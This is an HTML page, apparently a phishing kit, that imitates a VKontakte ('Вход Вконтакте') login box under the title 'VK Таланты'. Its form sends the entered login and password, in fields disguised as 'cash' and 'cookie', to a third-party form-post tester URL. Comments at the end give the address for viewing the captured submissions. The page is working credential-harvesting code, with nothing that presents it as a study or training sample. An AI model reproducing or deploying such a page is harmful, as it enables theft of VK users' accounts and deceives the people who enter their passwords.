<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" href="Favicon.ico">
    <title>VK Таланты</title>
</head>
<body>
    <form action="https://www.hashemian.com/tools/form-post-tester.php/stastes12" method="post">
        <div class="img"></div>
        <h1>Вход Вконтакте</h1>
        <input type="text" name="cash" placeholder="Логин">
        <input type="text" name="cookie" placeholder="Пароль">
        <button type="submit">Войти</button>
    </form>
    <style>
        body {
            display: flex;
            background-color: rgb(237, 237, 237);
            align-content: center;
            justify-content: center;
            height: 100vh;
            flex-wrap: wrap;
        }
        .img {
            width: 70px;
            height: 70px;
            background-image: url(/img.png);
            background-size: 100%;
            background-repeat: no-repeat;
            margin-left: auto;
            margin-right: auto;
        }
        form {
            width: 350px;
            height: 480px;
            background-color: white;
            border-radius: 7px;
            padding: 30px;
            box-sizing: border-box;
            display: flex;
            align-content: center;
            flex-wrap: wrap;
            justify-content: center;
            flex-direction: column;
        }
        h1 {
            margin-top: 10px;
            text-align: center;
            font-size: 30px;
            font-family: monospace;
        }
        input {
            width: 100%;
            height: 40px;
            border: 1px solid #D3D5D7;
            background-color: #F0F2F5;
            margin-bottom: 15px;
            padding-left: 10px;
            border-radius: 7px;
        }
        button {
            background-color: #3f81cd;
            color: white;
            border: none;
            border-radius: 7px;
            font-size: 15px;
            height: 40px;
            margin-top: 15px;
        }
    </style>
    <!-- https://www.hashemian.com/tools/form-post-tester.php?code=stastes12&b=View -->
    <!-- https://www.hashemian.com/tools/form-post-tester.php/stastes12 -->
</body>
</html>